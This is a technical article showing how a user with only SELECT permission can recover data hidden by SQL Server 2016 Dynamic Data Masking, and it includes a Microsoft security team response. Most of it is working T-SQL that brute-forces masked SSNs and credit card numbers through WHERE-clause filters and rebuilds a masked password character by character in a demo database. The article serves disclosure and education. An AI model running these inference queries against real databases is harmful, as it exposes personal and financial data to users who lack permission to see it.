SQL Server - Exposing masked data
Introduction
One of the new security features that SQL Server version 2016 brings, is DDM - Dynamic Data Masking. DDM is a solution that aims at real-time data masking of production data. DDM changes the data stream so that the data requester does not get full access to sensitive data, while no physical changes to the original production data take place.
Implementing DDM internally in SQL Server, aims to bring us better security, in the user level rules. One of the goals that embedded DDM supposed to bring, is that it's transparent to the client application. Users that gets security rules: SELECT, UPDATE, DELETE, INSERT able to work with the data freely, while keeping the masked rules. User not been granted permission "UNMASK", should not be able to expose the original value, if column configured to be masked. Is this actually works?!?
This blog shows how easy it is to expose the masked data, by any user, that has SELECT permission.
The purpose of this blog is NOT to teach people how to expose the data, but to make people understand that the new feature does not brings us the security it should, and that we might expects to get according to the documentation. If you are using or intend to use this feature, then this blog is a must for you!
This article based on a copy of the blog written by Ronen Ariely. The original blog includes several more issues regarding exposing data, which probably should not be exposed to users that have only SELECT permission, and several more advance cases. This article focuses only on exposing the basic masked data.
Preparation
Step 1: Let's create a new database, for the sake of our testing
USE [master]
GO
DROP DATABASE IF EXISTS [Ariely_DynamicMasking]
CREATE DATABASE [Ariely_DynamicMasking]
CONTAINMENT = NONE
GO
Step 2: Let's create a new (database level) USER based on (Instance level) LOGIN, which is based on (Instance level) CREDENTIAL
/**************************************************** */
/*********************************** SECURITY Elements */
/**************************************************** */
USE [master]
GO
/* ------------------------------------------- CREDENTIAL */
if not exists(select * from sys.credentials where name = 'Ariely_MaskingCredential')
BEGIN
CREATE CREDENTIAL Ariely_MaskingCredential
WITH IDENTITY = 'Ariely_MaskingIdentity',
SECRET = 'StrongPasswordHere' ;
END
GO
select * from sys.credentials
GO
/* ------------------------------------------- LOGIN */
if not exists(select * from sys.server_principals where name = 'Ariely_MaskingLogin')
BEGIN
CREATE LOGIN Ariely_MaskingLogin
WITH PASSWORD = 'Strong!Login@Password',
CREDENTIAL = Ariely_MaskingCredential;
END
GO
SELECT * FROM sys.server_principals
where name = 'Ariely_MaskingLogin'
GO
/* ------------------------------------------- USER */
use [Ariely_DynamicMasking]
GO
if not exists(select * from sys.database_principals where name = 'Ariely_MaskingUser')
BEGIN
CREATE USER Ariely_MaskingUser FOR LOGIN Ariely_MaskingLogin
WITH DEFAULT_SCHEMA = dbo;
END
GO
SELECT * from sys.database_principals
where name = 'Ariely_MaskingUser'
GO
Step 3: Now we can create the table, which includes the data that we want to mask
Use [Ariely_DynamicMasking];
GO
/**************************************************** */
/********************************************* DDL+DML */
/**************************************************** */
-- Create table with different data type columns
DROP TABLE IF EXISTS Ari_Users_Tbl
CREATE TABLE Ari_Users_Tbl (
UserID INT IDENTITY(1, 1) PRIMARY KEY
,F_Name NVARCHAR(30) NOT NULL
,L_Name NVARCHAR(30) NOT NULL
-----------------------------------------
,SSN INT NOT NULL
,Password NVARCHAR(12) NOT NULL
,CreditCard VARCHAR(20) NULL
,Salary MONEY NULL
,Email NVARCHAR(60) NULL
,BirthDate DATETIME NULL
,CONSTRAINT CONSTRAINT_SSN UNIQUE(SSN)
)
GO
-- insert a row
INSERT INTO [dbo].[Ari_Users_Tbl]
([F_Name],[L_Name], [Password], [SSN], [CreditCard], [Salary], [Email], [BirthDate])
VALUES
('Ronen','Ariely','sdFgs' , 123456789, '1111-1234-1234-1111',999999,'Not@MyEmail.com' , '20150227'),
('R' ,'A' ,'jkWlsUr', 987654321, '2222-1234-1234-2222',999999,'DefinitelyNot@MyEmail.com', '20160227')
GO
select * from dbo.Ari_Users_Tbl
GO
Image 1: SELECT result without masking
Step 4: implementing Masking using the new Dynamic Data Masking feature in SQL Server 2016
/**************************************************** */
/******************** implementing Masking in SQL 2016 */
/**************************************************** */
---------------------------------------------------------- Using "partial" function
ALTER TABLE Ari_Users_Tbl ALTER COLUMN [CreditCard]
ADD MASKED WITH (FUNCTION = 'partial(0,"XXXX-XXXX-XXXX-",4)')
GO
---------------------------------------------------------- Using "email" function
ALTER TABLE Ari_Users_Tbl ALTER COLUMN [Email]
ADD MASKED WITH (FUNCTION = 'email()')
GO
---------------------------------------------------------- Using "random" function
ALTER TABLE Ari_Users_Tbl ALTER COLUMN [SSN]
ADD MASKED WITH (FUNCTION = 'random(111111111,999999999)')
GO
---------------------------------------------------------- Using "default" for string
ALTER TABLE Ari_Users_Tbl ALTER COLUMN [Password]
ADD MASKED WITH (FUNCTION = 'default()')
GO
---------------------------------------------------------- Using "default" for MONEY
ALTER TABLE Ari_Users_Tbl ALTER COLUMN [Salary]
ADD MASKED WITH (FUNCTION = 'default()')
GO
---------------------------------------------------------- Using "default" on date
ALTER TABLE Ari_Users_Tbl ALTER COLUMN [BirthDate]
ADD MASKED WITH (FUNCTION = 'default()')
GO
Step 5: GRANT Permissions to the user and check the masking
/**************************************************** */
/*********************************** GRANT Permissions */
/**************************************************** */
GRANT SELECT ON Ari_Users_Tbl TO Ariely_MaskingUser;
GRANT INSERT ON Ari_Users_Tbl TO Ariely_MaskingUser;
GRANT UPDATE ON Ari_Users_Tbl TO Ariely_MaskingUser;
GO
Let's see how it is working... Below code execute a simple SELECT query on the table, with impersonate to the new user. You can compare the result in Image 2 to to image 1 above.
/**************************************************** */
/**************************** Testing Masking SQL 2016 */
/**************************************************** */
/*------------------------------------------- MaskingUser user - SELECT */
-- Impersonate different user
EXECUTE AS USER = 'Ariely_MaskingUser';
GO
SELECT USER_NAME(), SUSER_NAME()
GO
SELECT
UserID,F_Name,L_Name,SSN,CreditCard,Email
,Password,Salary,BirthDate
FROM Ari_Users_Tbl;
GO
-- Stop impersonate
REVERT;
GO
Image 2: Execute SELECT as simple User
Expose the masked data, Step-By-Step
Our goal is to expose the masked data in order to get the full unmasked data. We will impersonate the user, which don't have permission to see the unmasked data, and we will try to exposes the data.
-- Execute this statement
-- Everything that we are going to do till the end during exposing of the masked data will be done by the new user
EXECUTE AS USER = 'Ariely_MaskingUser';
GO
Please execute the above query, and let's start examine, how can we expose the data.
History! You may find lot of posts/blogs online, which uses statements that exposed the data during the beta versions, but these are no longer working on the release version:
- Using "SELECT INTO" or "INSERT INTO" in order to copy the unmasked data to another table.
- Using sub-queries in the select section, or function to manipulate the data in the select section, in order to expose different data, which include part or all of the masked data.
We can use filter in order to select or update specific row(s), by comparing the value of the original masked column, as it is stored in the database (the unmasked value). This is a security breach!
-- Security breach!
UPDATE [dbo].[Ari_Users_Tbl]
SET [CreditCard] = '3333-1234-1234-3333'
WHERE [SSN] = 123456789 -- We can filter masked column, by comparing it's exposed value
GO
SELECT * FROM Ari_Users_Tbl;
GO
Goal 1: Find the [SSN] number for UserID = 1
The simplest case that we can think about is to find a number. The SSN is a simple integer number, and that will be great as our first example. Our goal is to find the SSN number for the user with userID = 1.
SELECT u.F_Name, u.L_Name,u.SSN
FROM Ari_Users_Tbl u
where u.UserID = 1
GO
If we add to the above query a filter on SSN, and that value will not be the user correct value, then we will not get any row back:
select u.F_Name, u.L_Name,u.SSN,u.CreditCard
from Ari_Users_Tbl U
where U.UserID = 1
and SSN = 333333333 - This is not the correct SSN value
GO
But if we will use the correct SSN value of the user, then we will get the row back. This is the basic logic in the procedure to expose the value. We can simply phish the value. Theoretically, we can test any available value until we will get the correct SSN value (for example using loop).
-- Fishing (Phishing) the value!
select u.F_Name, u.L_Name,u.SSN,u.CreditCard
from Ari_Users_Tbl U
where U.UserID = 1
and SSN = 123456789 -- This is the correct value, therefore the row will return
GO
Once we understand the basic idea, we can implement a simple query. We will use dynamic numbers table created in CTE, in order to expose the SSN for any user, very fast as you can see in the next query:
-- Dynamically Fishing (Phishing) the value!
Declare @UserId int = 1
;With MyCTE as (
SELECT TOP 99999 ROW_NUMBER() OVER (ORDER BY (select NULL)) AS Number
FROM sys.all_objects s1
CROSS JOIN sys.all_objects s2
)
select u.F_Name, u.L_Name,u.SSN
, CONVERT(NVARCHAR(MAX),Nf.Number) + CONVERT(NVARCHAR(MAX),N.Number) as Real_SSN
from Ari_Users_Tbl U
LEFT JOIN MyCTE Nf on Nf.Number = U.SSN / 10000 -- 5 first numbers
LEFT JOIN MyCTE N on N.Number = U.SSN % 10000 -- 4 first numbers
where U.UserID = @UserId
GO
Creating big number table dynamically might cost memory and CPU. For better performance, we create smaller number table, and expose the number in two steps. Firstly, we find the 5 first numbers and next the 4 last numbers, assuming that the number has 9 digits like in Israel.
Goal 2: Find the CreditCard number for UserID = 1
The basic logic is exactly like the previous section. A Credit Card number has a specific format, which make it very simple and fast to be exposed.
-- Dynamically Fishing the CreditCard!
Declare @UserId int = 1
;With MyCTE as (
SELECT TOP 99999 ROW_NUMBER() OVER (ORDER BY (select NULL)) AS Number
FROM sys.all_objects s1
CROSS JOIN sys.all_objects s2
)
SELECT u.F_Name, u.L_Name,u.CreditCard
,CONVERT(NVARCHAR(MAX), N1.Number) + '-' +
CONVERT(NVARCHAR(MAX), N2.Number) + '-' +
CONVERT(NVARCHAR(MAX), N3.Number) + '-' +
CONVERT(NVARCHAR(MAX), N4.Number) as Real_CreditCard
FROM Ari_Users_Tbl u
LEFT JOIN MyCTE N1 on N1.Number = CONVERT(INT,SUBSTRING(u.CreditCard,1,4))
LEFT JOIN MyCTE N2 on N2.Number = CONVERT(INT,SUBSTRING(u.CreditCard,6,4))
LEFT JOIN MyCTE N3 on N3.Number = CONVERT(INT,SUBSTRING(u.CreditCard,11,4))
LEFT JOIN MyCTE N4 on N4.Number = CONVERT(INT,SUBSTRING(u.CreditCard,16,4))
where U.UserID = @UserId
GO
Goal 3: Expose Free text like password column
The most complex case is when we need to find free text, which we have no information about it's format or anything else. For the sake of our demo, we will expose the user password. This option can be implemented on any textual value. In this section we will use specific logic based on three steps. You can find other algorithm, which might fit your case better. For more advance cases and exposing data which can help you, you can check the original blog.
* we can use temporary numbers table, instead of dynamically use Common Table Expressions. This allows us to create index on the table to improve performance (I reminds you that we are still using the new user, which has no special permissions!).
Preparation: Create temporary indexed table
DROP TABLE IF EXISTS #NumbersTbl
SELECT TOP 10000 IDENTITY(int,1,1) AS Number
INTO #NumbersTbl
FROM sys.all_objects s1
CROSS JOIN sys.all_objects s2
ALTER TABLE #NumbersTbl ADD CONSTRAINT PK_NumbersTbl PRIMARY KEY CLUSTERED (Number)
GO
Step 1: Find the text length
select u.UserID,n.Number
from Ari_Users_Tbl u
JOIN #NumbersTbl n ON LEN(u.Password) = n.Number
WHERE UserID = 1
GO
Step 2: Find list of all the characters in the text
in the end of this step we will not know how many times each character used or the order of the characters, but we will know which characters include in the text.
For the sake of this article we assume that the password includes only English characters. Therefore, we filter the data between ASCII number 65 and 90, which is uppercase English chars, and between 97 to 122, which is the lowercase English chars. You can change the filter according to your needs (if needed you can search for any readable char).
DROP TABLE IF EXISTS #QQ
SELECT * INTO #QQ
FROM (
SELECT u.UserID,CHAR(n.Number) c
from Ari_Users_Tbl u
JOIN #NumbersTbl n
on u.Password like '%' + CHAR(n.Number) + '%'
COLLATE Hebrew_CS_AS -- Case sensitive Hebrew
-- In our case the password can be only English latters
where u.UserID = 1
-- All English latters
AND (
(n.Number >= 65 and n.Number < 90)
or (n.Number >= 97 and n.Number < 122)
)
) T
GO
SELECT * FROM #QQ
GO
Step 3: Find the text
Using the information from step 1 and step 2 we can find the exact text. We already have the information about all the chars in the password and the length of the password. Now I will use this information to find the exact password.
For the sake of the explanation I use the above information, manually. We can create one query that executes these three steps together, as one statement.
DECLARE @LEN INT = 1, @Pass NVARCHAR(MAX) = ''
WHILE @LEN <= 5 -- we found that the len is 5 in step 1
BEGIN
SELECT @Pass = @Pass + c.c
from #QQ c
INNER JOIN Ari_Users_Tbl a on SUBSTRING(a.Password,@LEN,1) = c.c
where a.UserID = 1
SET @LEN = @LEN + 1
END
select u.F_Name, u.L_Name,u.Password, @Pass as Real_Password
from Ari_Users_Tbl u
where u.UserID = 1
GO
Voila! we found the user password :-)
Comments & Conclusions
The built-in new feature is very powerful and it's brings great option to dynamically mask the data and manage the masked data, transparently to the client apps. It can save the developer lot of time and resources. It can even brings better security. Since the data is masked in the database level, it is less exposed to attacks like "Man-in-the-middle", but yet, it does not brings us security in the USER level! Any user that has SELECT permission can exposes the data, as we show in this article.
The main issue is that the filter done on the original unmasked data, instead of after masking the data on the masked data. In one side, this gives us the power to filter rows freely by using the masked columns, but in the other hand, this is a security breach! There is no reason that a user that not supposed to have any information regarding unmasked data, will have the option to filter by that value.
* What is the solution? We can use the new feature "as it is" and understand that it does not gives us security in the USER level, or we can go back to other solutions, which we use on older version. For example, implementing Dynamic Data Masking by building security layer in the database level. This option gives great security, but cost lot of developing time!
From the Microsoft SQL Data Security team:
Do not edit this paragraph!!
This section is a quote from an email sent as a feedback to the original blog, by the SQL Data Security team, for the sake of the readers.
Thanks Ronen for writing about one of our new SQL data security features, Dynamic Data Masking. As you stated, Dynamic Data Masking is a new and powerful feature built-in to SQL Server 2016 and Azure SQL DB. It enables developers to easily and centrally obfuscate sensitive information in their applications. This can save a lot of time and effort of limiting exposure to data in the application layer. It can also be used to help prevent accidental exposure to engineers connecting directly to the production database for specific purposes. Dynamic Data Masking is very easy to configure for specific sensitive data fields, and is transparent to the application. It is also important to clarify, as you do in your blog, that while Dynamic Data Masking can help secure your applications, is not a full security solution for blocking access to sensitive data – specifically in the case where users have direct access to the database and can run ad-hoc queries. It is intended to limit exposure of sensitive data and centralize the policy, but the data can be disclosed by malicious intent using brute force techniques when evaluating this feature in isolation. In fact, Dynamic Data Masking is one tool in an arsenal of security features offered by SQL, which complement each other to provide state-of-the-art security for your database. As in any defense strategy, we recommend using a combination of these built-in capabilities in order to protect your data. For the examples you demonstrate in your blog, we highly recommend enabling Auditing to track database activity, defining proper permissions models and using an encryption feature like Always Encrypted to protect the most highly classified sensitive data. Please take a look at this overview of SQL security capabilities to learn more about our recommended best practices for data security. SQL Data Security team, |
Resources and more information
- This article Initially posted as a blog by Ronen Ariely: SQL Server 2016 - Crack the masking
- The original blog includes several more issues regarding exposing data, which probably should not be exposed to users that have only SELECT permission.
- T-SQL: Dynamic Data Masking
- Database Engine: Dynamic Data Masking
- Securing your SQL Database
- New Security Features in SQL Server 2016 - Presentation & Demo